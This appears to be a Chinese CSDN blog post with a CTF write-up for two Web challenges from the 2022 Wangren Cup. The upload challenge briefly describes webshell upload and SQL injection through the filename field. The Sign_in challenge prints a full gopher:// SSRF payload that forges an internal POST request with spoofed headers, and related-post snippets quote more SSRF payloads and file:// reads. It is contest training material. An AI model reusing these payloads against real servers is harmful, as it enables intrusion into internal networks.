2022第二届网刃杯网络安全大赛-Web

最新推荐文章于 2023-02-17 10:06:53 发布
最新推荐文章于 2023-02-17 10:06:53 发布
阅读量592 收藏 5
点赞数 1
分类专栏: 面试 学习路线 阿里巴巴 文章标签: web安全 安全 网络 java jar
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/web18224617243/article/details/125056901
版权
面试 同时被 3 个专栏收录
124 篇文章 6 订阅
订阅专栏
阿里巴巴
120 篇文章 0 订阅
订阅专栏
学习路线
114 篇文章 0 订阅
订阅专栏

2022第二届网刃杯网络安全大赛-Web

前言

提示:该内容由夜刃TEOT战队-师傅原创,禁止抄袭!

一、Web2-upload

难度系数:4.0
题目描述:只有想不到,没有做不到,sql yyds。题目链接见附件,每个链接均可访问,环境5分钟重启一次。

  1. 文件上传,随便上传一个马
    在这里插入图片描述
    在这里插入图片描述

  2. 使用Burp抓包
    在这里插入图片描述
    在这里插入图片描述

  3. 根据提示,更改类型
    在这里插入图片描述

  4. 上传文件
    在这里插入图片描述

  5. 查询到filename上传点,报错注入,获取FLAG
    在这里插入图片描述
    在这里插入图片描述

  6. flag{5937a0b90b5966939cccd369291c68aa}

二、Web3-Sign_in

难度系数:3.0
题目描述:炒鸡简单的签到题,玩的开心~~~~ 题目链接见附件,每个链接均可访问,环境5分钟重启一次。

  1. 通过ARP记录得到WEB地址

  2. IP: 172.73.24.100
    在这里插入图片描述

  3. 经过一步步的提示最终构造Payload 获取FLAG.
    在这里插入图片描述

  4. Payload:

    http://124.220.9.19:20001/?
    url=gopher://172.73.24.100:80/_POST%2520%252Findex.php%253Fa%253Dflag%2520HTTP%2 52F1.1%250D%250AHost%253A%2520172.73.24.100%250D%250AContent-
    Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent- Length%253A%252011%250D%250AX-FORWARDED-
    FOR%253A%2520127.0.0.1%250D%250AREFERER%3A%20bolean.club%250D%250A%250D%250Ab%25 3Dflag%250D%250A

在这里插入图片描述

  1. flag{Have_A_GoOd_T1m3!!!}
web18224617243
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022第二届网刃杯网络安全大赛题包
04-25
2022第二届网刃杯网络安全大赛题包
2022网刃杯
姜小孩的博客
05-06 1142
网刃杯2022 2022网刃杯
2022网刃杯web
羽的博客
04-25 1498
signin 源码如下 <?php highlight_file(__FILE__); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $_GET['url']); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); ?> 很明显的ssrf漏洞。用dict协议探测了下3306、6379、9000端口。应该是都没
网刃杯 第二届 2022 web
weixin_43610673的博客
04-25 564
Sign_in File协议读取/etc/hosts得到内网ip http://探测内网主机 按照提示传参,添加http头即可,用gopher发送post数据 http://124.220.9.19:8091/?url=gopher://172.73.23.100:80/%5f%50%4f%53%54%25%32%30%2f%25%33%46%61%25%33%44%31%25%32%30%48%54%54%50%2f%31%2e%31%25%30%44%25%30%41%48%6f%73%74%
2022第二届网刃杯网络安全大赛 MISC-玩坏的winxp 详细解题过程。
04-25
第二届网刃杯 MISC 玩坏的winxp 详细解题过程加踩坑经过,图片清晰,过程流畅,包含试题包:https://share.weiyun.com/sNe1Dgsj
广东大学生网络安全攻防大赛(题目附件-剩下的)
05-25
该文件包含了比赛上本人没做出来的题目的附件
2023 年全国行业职业技能大赛-第二届美亚柏科杯“数据安全管理员”实操真题附件
01-02
2023 年全国行业职业技能大赛---第二届美亚柏科杯“数据安全管理员”实操真题附件 学生组WEB源码文件
2020年第六届“湖湘杯”网络安全技能大赛洞庭决赛-互联网选拔赛-第二场-线上CTF赛.zip
11-01
2020年第六届“湖湘杯”网络安全技能大赛洞庭决赛-互联网选拔赛-第二场-线上CTF赛 真题。包含web,misc,pwn,reverse,crypto等20道题目。仅供学习交流。
网鼎杯 白虎组.zip
05-15
2020年第二届 网鼎杯网络安全大赛白虎组 线下赛 真题 pwn reserve web misc 按照“网鼎杯”大赛两年一届的举办原则,第二届“网鼎杯”大赛5月开赛,6月19日至21日在广东省深圳市举办线下半决赛、总决赛和颁奖典礼。
2021第一届网刃杯网络安全大赛.zip
09-13
2021第一届网刃杯网络安全大赛.zip
第二届网刃杯 WEB
qq_53263789的博客
04-26 377
Sign_in 一道SSRF 看一下网络情况 http://124.222.173.163:20003/?url=file:///proc/net/arp 访问一下 100,因为长的奇怪 绕后就是添加一下XFF,Ref头信息,gopher打过去就好 exp import urllib.parse payload =\ """ POST /?a=1 HTTP/1.1 Host: bolean.club Content-Type: application/x-www-form-urlencoded Co
2023年网络安全比赛--Web综合渗透测试中职组(超详细)
Aluxian_的博客
02-08 2064
1.通过URL访问http://靶机IP/1,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;2.通过URL访问http://靶机IP/2,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;3.通过URL访问http://靶机IP/3,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;4.通过URL访问http://靶机IP/4,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;
中职网络安全比赛之Web综合渗透测试
cike_y
02-17 971
一次关于关于中职比赛题目的web渗透页面的笔记,有什么不懂的都可以找我。
2022第二届网刃杯网络安全大赛-MISC
qq_43264813的博客
04-25 1081
系列文章目录 前言 `提示:该内容由夜刃TEOT战队-sn0w师傅原创,禁止抄袭! 一、MISC-玩坏的winxp 难度系数:4.0 题目描述:小敏的电脑Windows XP Professional不小心被玩坏了,里边有重要的东西,你能帮帮她吗? 看到vmdk本能的去vm挂载,但是报错打不开,不能挂载,尝试了几次就不想浪费时间了,简单的搜寻之后,winhex也能挂,就挂到winhex下看看 进到分区1里面,先找桌面看有没有有用的信息,看到桌面有个名为“10个t的学习资料” 里面是5个图
2022第二届网刃杯网络安全大赛
tlovejr的博客
05-06 2947
前言 前段时间在机缘巧合下参加了这次的比赛,距离比赛结束也有一星期的时间,现在把部分题解给大家说一下 一、ICS1-ncsubj 1、首先先打开数据包进行查看,并追踪一下tcp流看看有没有什么收获信息 2、在上图可以看到,有3段被分开的base64编码,那就直接合起来解密 anx1fG58Z3xufGF8cHxmfGh8b3x3fHJ8cHxnfA== j|u|n|g|n|a|p|f|h|o|w|r|p|g| 3、发现上面还是有加密,同事大神说这个其实随波逐流解码,那就直接利用软件
第二届网刃杯网络安全大赛(re部分)
weixin_49764009的博客
04-25 3105
RE freestyle 基本面 64位 无壳 静态分析 主函数中两个加密 验证成功之后的值进行md5加密即可 先看第一个函数(fun1) if判断 只要不让if成立即可 看第二个函数 一样的道理 直接上爆破脚本 方便又快捷 for i in range(10000): if (i*3//9-9)*4 == 4400: print(i) for i in range(10000): if (2 * (i % 56)) == 98: print(i)
h3c杯2010全国大学生网络技术大赛----初赛试卷
最新发布
02-06
h3c杯2010全国大学生网络技术大赛初赛试卷包括了网络基础知识、网络技术应用和网络安全等多个方面的题目。首先是网络基础知识部分,考察参赛选手对网络的结构、协议、设备和常见问题的了解程度。其次是网络技术应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值